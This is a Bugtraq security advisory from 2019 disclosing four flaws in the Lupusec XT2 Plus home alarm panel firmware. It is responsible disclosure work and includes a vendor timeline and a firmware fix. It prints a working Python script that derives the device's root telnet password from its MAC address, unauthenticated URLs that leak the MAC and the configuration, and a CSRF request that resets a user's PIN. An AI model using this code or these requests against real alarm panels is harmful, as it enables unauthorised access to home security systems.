Various vulnerabilities in Lupusec XT2 Plus home alarm system

From: Dan Fabian <dan.fabian@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Various vulnerabilities in Lupusec XT2 Plus home alarm system
Date:


=======================================================================
              title: Multiple Vulnerabilities
            product: Lupusec XT2 Plus Main Panel
            version: Firmware 0.0.2.19E
           homepage: https://www.lupus-electronics.de/
              found: 01/2019
                 by: D. Fabian
=======================================================================

Vendor description:
-------------------
"The new LUPUSEC-XT2 Plus is an innovative burglar alarm, smart home,
and video surveillance system that is reliable, easy to use, and
extremely versatile. It is the operating system for your building."

Source:
https://www.lupus-electronics.de/shop/en/Alarm-Smarthome/Centrals/LUPUSEC-XT2-Plus-Main-Panel-p.html


Vulnerability description:
-----------------------------------
1) Shared SSL certificate
All devices share the same SSL key. Anyone who is capable of
downloading the firmware off the internet can perform a MITM attack.


2) Root password derived from MAC address
While the root password is unique per device, it is derived from the
MAC address and can be fairly easily calculated off a hard-coded
secret. The panel runs a telnet server on port 55023, where the
calculated root password works. Additionally
https://alarm/action/welcomeGet discloses the MAC address without
authentication over the web interface. In combination, all of this is
sufficient to authenticate as root to any XT2 device exposed directly
on the internet.

The below small Python script returns the root password for the given
MAC address.

import hashlib
import sys

mac = "001122aabbcc" # MAC address without colons in all lowercase
x = "7jBhPZVbCJMrS9qg6KtxzHR5T2dk3NmvQ4WDywFsYpXnc8Gf"
y = "5156" + mac + "2759"
digest = hashlib.sha256()
digest.update(y)
z = digest.digest()
sys.stdout.write(x[ord(z[5]) % len(x)])
sys.stdout.write(x[ord(z[7]) % len(x)])
sys.stdout.write(x[ord(z[28]) % len(x)])
sys.stdout.write(x[ord(z[6]) % len(x)])
sys.stdout.write(x[ord(z[24]) % len(x)])
sys.stdout.write(x[ord(z[15]) % len(x)])
sys.stdout.write(x[ord(z[13]) % len(x)])
sys.stdout.write(x[ord(z[16]) % len(x)])

sys.stdout.flush()


3) Configuration including passwords downloadable without authentication
If the configuration of the device has been exported since the
previous reboot, it can be downloaded without authentication via
https://alarm/temp/config.tar.gz. The configuration contains PINs,
user passwords, and all other configuration settings. Passwords and
PINs are "encrypted" using a simple substitution cipher.


4) XML API vulnerable to CSRF
The XML API accepts requests via both GET and POST, and does not
require CSRF tokens. E.g. the following request sets the PIN of user 5
to 4444. The MAC address is publicly disclosed via the web interface
per issue #2.

https://alarm/action/xmlCmd?strXML=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%0A%3Cp%3E%0A++%3Cmac+v%3D%2200%3A11%3A22%3A33%3A44%3A44%22%2F%3E%0A++%3Ccmds%3E%0A%3Ccmd+a%3D%22setUser%22%3E%0A%3Carea+v%3D%221%22%2F%3E%0A%3Cno+v%3D%225%22%2F%3E%0A%3Ccode+v%3D%224444%22%2F%3E%0A%3Cname+v%3D%22test%22%2F%3E%0A%3Clatch+v%3D%220%22%2F%3E%0A%3C%2Fcmd%3E%0A++%3C%2Fcmds%3E%0A%3C%2Fp%3E


Vendor contact timeline:
------------------------
2019-01-09: Contacted the vendor
2019-01-09: Vendor reply saying that the issues are known and should be fixed
            in the new firmware release.
2019-03-26: Vendor reply saying the new firmware was released


Solution:
---------
Per the vendor\u2019s recommendation, update the firmware to version v0.0.3.0.

Note that I didn\u2019t verify whether the issues are indeed resolved in
the new version. Either way it\u2019s probably a good idea to only expose
the device through a VPN.





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.